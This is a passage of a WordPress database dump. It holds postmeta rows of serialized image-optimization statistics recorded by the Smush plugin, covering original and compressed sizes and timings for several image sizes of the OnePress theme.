s:10:\"size_after\";i:28458;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:64697;s:10:\"size_after\";i:64697;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:58094;s:10:\"size_after\";i:58094;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:173880;s:10:\"size_after\";i:173880;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4261,2317,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:269521;s:10:\"size_after\";i:269521;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:25027;s:10:\"size_after\";i:25027;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:55296;s:10:\"size_after\";i:55296;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:51344;s:10:\"size_after\";i:51344;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:137854;s:10:\"size_after\";i:137854;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;}}}'),(4262,2316,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:174572;s:10:\"size_after\";i:174572;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:35802;s:10:\"size_after\";i:35802;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:77124;s:10:\"size_after\";i:77124;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:61646;s:10:\"size_after\";i:61646;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}}}'),(4263,2315,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:317446;s:10:\"size_after\";i:317446;s:4:\"time\";d:0.340000000000000024424906541753443889319896697998046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:31554;s:10:\"size_after\";i:31554;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:66971;s:10:\"size_after\";i:66971;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:56478;s:10:\"size_after\";i:56478;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:162443;s:10:\"size_after\";i:162443;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;}}}'),(4264,2314,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:186622;s:10:\"size_after\";i:186622;s:4:\"time\";d:0.25;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:36896;s:10:\"size_after\";i:36896;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:79169;s:10:\"size_after\";i:79169;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:70557;s:10:\"size_after\";i:70557;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4265,2313,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:196093;s:10:\"size_after\";i:196093;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:39240;s:10:\"size_after\";i:39240;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:83573;s:10:\"size_after\";i:83573;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:73280;s:10:\"size_after\";i:73280;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}}}'),(4266,2312,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:361761;s:10:\"size_after\";i:361761;s:4:\"time\";d:0.2300000000000000099920072216264088638126850128173828125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:34068;s:10:\"size_after\";i:34068;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:73995;s:10:\"size_after\";i:73995;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:67716;s:10:\"size_after\";i:67716;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:185982;s:10:\"size_after\";i:185982;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;}}}'),(4267,2311,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:412137;s:10:\"size_after\";i:412137;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:30989;s:10:\"size_after\";i:30989;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:81519;s:10:\"size_after\";i:81519;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:71614;s:10:\"size_after\";i:71614;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:228015;s:10:\"size_after\";i:228015;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4268,2310,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:186334;s:10:\"size_after\";i:186334;s:4:\"time\";d:0.1600000000000000033306690738754696212708950042724609375;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:3:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:37964;s:10:\"size_after\";i:37964;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:81373;s:10:\"size_after\";i:81373;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:66997;s:10:\"size_after\";i:66997;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}}}'),(4269,2309,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:368382;s:10:\"size_after\";i:368382;s:4:\"time\";d:0.2600000000000000088817841970012523233890533447265625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:33085;s:10:\"size_after\";i:33085;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:74194;s:10:\"size_after\";i:74194;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:69304;s:10:\"size_after\";i:69304;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:191799;s:10:\"size_after\";i:191799;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4270,2308,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:297802;s:10:\"size_after\";i:297802;s:4:\"time\";d:0.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:28383;s:10:\"size_after\";i:28383;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:61330;s:10:\"size_after\";i:61330;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:56036;s:10:\"size_after\";i:56036;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:152053;s:10:\"size_after\";i:152053;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}}}'),(4271,2307,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:273812;s:10:\"size_after\";i:273812;s:4:\"time\";d:0.2800000000000000266453525910037569701671600341796875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:27195;s:10:\"size_after\";i:27195;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:57394;s:10:\"size_after\";i:57394;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:52884;s:10:\"size_after\";i:52884;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:136339;s:10:\"size_after\";i:136339;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}}}'),(4272,2306,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:285520;s:10:\"size_after\";i:285520;s:4:\"time\";d:0.29000000000000003552713678800500929355621337890625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:27772;s:10:\"size_after\";i:27772;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:58723;s:10:\"size_after\";i:58723;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:53445;s:10:\"size_after\";i:53445;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";i:0;s:5:\"bytes\";i:0;s:11:\"size_before\";i:145580;s:10:\"size_after\";i:145580;s:4:\"time\";d:0.1499999999999999944488848768742172978818416595458984375;}}}'),(4273,2290,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:13.36454964305061565710275317542254924774169921875;s:5:\"bytes\";i:24917;s:11:\"size_before\";i:186441;s:10:\"size_after\";i:161524;s:4:\"time\";d:0.67000000000000003996802888650563545525074005126953125;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:4:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.510000000000001563194018672220408916473388671875;s:5:\"bytes\";i:2721;s:11:\"size_before\";i:13946;s:10:\"size_after\";i:11225;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.980000000000000426325641456060111522674560546875;s:5:\"bytes\";i:4572;s:11:\"size_before\";i:38176;s:10:\"size_after\";i:33604;s:4:\"time\";d:0.13000000000000000444089209850062616169452667236328125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:15.6500000000000003552713678800500929355621337890625;s:5:\"bytes\";i:5337;s:11:\"size_before\";i:34109;s:10:\"size_after\";i:28772;s:4:\"time\";d:0.14000000000000001332267629550187848508358001708984375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.2599999999999997868371792719699442386627197265625;s:5:\"bytes\";i:12287;s:11:\"size_before\";i:100210;s:10:\"size_after\";i:87923;s:4:\"time\";d:0.330000000000000015543122344752191565930843353271484375;}}}'),(4274,2284,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.802710802710802084902752540074288845062255859375;s:5:\"bytes\";i:4001;s:11:\"size_before\";i:37037;s:10:\"size_after\";i:33036;s:4:\"time\";d:0.11000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.21000000000000085265128291212022304534912109375;s:5:\"bytes\";i:1246;s:11:\"size_before\";i:15184;s:10:\"size_after\";i:13938;s:4:\"time\";d:0.05000000000000000277555756156289135105907917022705078125;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.6099999999999994315658113919198513031005859375;s:5:\"bytes\";i:2755;s:11:\"size_before\";i:21853;s:10:\"size_after\";i:19098;s:4:\"time\";d:0.059999999999999997779553950749686919152736663818359375;}}}'),(4275,2283,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.8967829106021998342157530714757740497589111328125;s:5:\"bytes\";i:8710;s:11:\"size_before\";i:58469;s:10:\"size_after\";i:49759;s:4:\"time\";d:0.11999999999999999555910790149937383830547332763671875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.0099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:1916;s:11:\"size_before\";i:23915;s:10:\"size_after\";i:21999;s:4:\"time\";d:0.040000000000000000832667268468867405317723751068115234375;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:19.660000000000000142108547152020037174224853515625;s:5:\"bytes\";i:6794;s:11:\"size_before\";i:34554;s:10:\"size_after\";i:27760;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;}}}'),(4276,2281,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:14.807500415765840529047636664472520351409912109375;s:5:\"bytes\";i:7123;s:11:\"size_before\";i:48104;s:10:\"size_after\";i:40981;s:4:\"time\";d:0.1000000000000000055511151231257827021181583404541015625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:2:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.2799999999999993605115378159098327159881591796875;s:5:\"bytes\";i:1744;s:11:\"size_before\";i:18798;s:10:\"size_after\";i:17054;s:4:\"time\";d:0.0299999999999999988897769753748434595763683319091796875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:18.35000000000000142108547152020037174224853515625;s:5:\"bytes\";i:5379;s:11:\"size_before\";i:29306;s:10:\"size_after\";i:23927;s:4:\"time\";d:0.070000000000000006661338147750939242541790008544921875;}}}'),(4277,2271,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.5494623769376065780534190707840025424957275390625;s:5:\"bytes\";i:11893;s:11:\"size_before\";i:94769;s:10:\"size_after\";i:82876;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.3699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:413;s:11:\"size_before\";i:4933;s:10:\"size_after\";i:4520;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.92999999999999971578290569595992565155029296875;s:5:\"bytes\";i:942;s:11:\"size_before\";i:7893;s:10:\"size_after\";i:6951;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:13.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:4653;s:11:\"size_before\";i:33857;s:10:\"size_after\";i:29204;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:797;s:11:\"size_before\";i:7561;s:10:\"size_after\";i:6764;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.9700000000000006394884621840901672840118408203125;s:5:\"bytes\";i:1861;s:11:\"size_before\";i:15552;s:10:\"size_after\";i:13691;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:3227;s:11:\"size_before\";i:24973;s:10:\"size_after\";i:21746;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4278,2270,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:12.01308765283278745528150466270744800567626953125;s:5:\"bytes\";i:10464;s:11:\"size_before\";i:87105;s:10:\"size_after\";i:76641;s:4:\"time\";d:0.08000000000000000166533453693773481063544750213623046875;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.269999999999999573674358543939888477325439453125;s:5:\"bytes\";i:446;s:11:\"size_before\";i:4809;s:10:\"size_after\";i:4363;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.5099999999999997868371792719699442386627197265625;s:5:\"bytes\";i:850;s:11:\"size_before\";i:7385;s:10:\"size_after\";i:6535;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.96000000000000085265128291212022304534912109375;s:5:\"bytes\";i:3929;s:11:\"size_before\";i:30327;s:10:\"size_after\";i:26398;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.9000000000000003552713678800500929355621337890625;s:5:\"bytes\";i:705;s:11:\"size_before\";i:7123;s:10:\"size_after\";i:6418;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.1300000000000007815970093361102044582366943359375;s:5:\"bytes\";i:1789;s:11:\"size_before\";i:14748;s:10:\"size_after\";i:12959;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:12.089999999999999857891452847979962825775146484375;s:5:\"bytes\";i:2745;s:11:\"size_before\";i:22713;s:10:\"size_after\";i:19968;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4279,2269,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.8647535227751514952387879020534455776214599609375;s:5:\"bytes\";i:9468;s:11:\"size_before\";i:106805;s:10:\"size_after\";i:97337;s:4:\"time\";d:0.0899999999999999966693309261245303787291049957275390625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:6.7400000000000002131628207280300557613372802734375;s:5:\"bytes\";i:372;s:11:\"size_before\";i:5518;s:10:\"size_after\";i:5146;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.839999999999999857891452847979962825775146484375;s:5:\"bytes\";i:678;s:11:\"size_before\";i:8645;s:10:\"size_after\";i:7967;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.730000000000000426325641456060111522674560546875;s:5:\"bytes\";i:3751;s:11:\"size_before\";i:38546;s:10:\"size_after\";i:34795;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:7.11000000000000031974423109204508364200592041015625;s:5:\"bytes\";i:592;s:11:\"size_before\";i:8322;s:10:\"size_after\";i:7730;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.8699999999999992184029906638897955417633056640625;s:5:\"bytes\";i:1615;s:11:\"size_before\";i:18209;s:10:\"size_after\";i:16594;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.9199999999999999289457264239899814128875732421875;s:5:\"bytes\";i:2460;s:11:\"size_before\";i:27565;s:10:\"size_after\";i:25105;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}}}'),(4280,2267,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:10.4097613062531966221513357595540583133697509765625;s:5:\"bytes\";i:9359;s:11:\"size_before\";i:89906;s:10:\"size_after\";i:80547;s:4:\"time\";d:0.0799999999999999877875467291232780553400516510009765625;s:11:\"api_version\";s:3:\"1.0\";s:5:\"lossy\";b:0;s:9:\"keep_exif\";i:0;}s:5:\"sizes\";a:6:{s:9:\"thumbnail\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.019999999999999573674358543939888477325439453125;s:5:\"bytes\";i:416;s:11:\"size_before\";i:5185;s:10:\"size_after\";i:4769;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:6:\"medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.699999999999999289457264239899814128875732421875;s:5:\"bytes\";i:748;s:11:\"size_before\";i:7715;s:10:\"size_after\";i:6967;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:12:\"medium_large\";O:8:\"stdClass\":5:{s:7:\"percent\";d:11.519999999999999573674358543939888477325439453125;s:5:\"bytes\";i:3562;s:11:\"size_before\";i:30926;s:10:\"size_after\";i:27364;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:19:\"onepress-blog-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:8.910000000000000142108547152020037174224853515625;s:5:\"bytes\";i:661;s:11:\"size_before\";i:7416;s:10:\"size_after\";i:6755;s:4:\"time\";d:0.0200000000000000004163336342344337026588618755340576171875;}s:14:\"onepress-small\";O:8:\"stdClass\":5:{s:7:\"percent\";d:9.8599999999999994315658113919198513031005859375;s:5:\"bytes\";i:1470;s:11:\"size_before\";i:14916;s:10:\"size_after\";i:13446;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}s:15:\"onepress-medium\";O:8:\"stdClass\":5:{s:7:\"percent\";d:10.53999999999999914734871708787977695465087890625;s:5:\"bytes\";i:2502;s:11:\"size_before\";i:23748;s:10:\"size_after\";i:21246;s:4:\"time\";d:0.01000000000000000020816681711721685132943093776702880859375;}}}'),(4281,2266,'wp-smpro-smush-data','a:2:{s:5:\"stats\";a:8:{s:7:\"percent\";d:8.45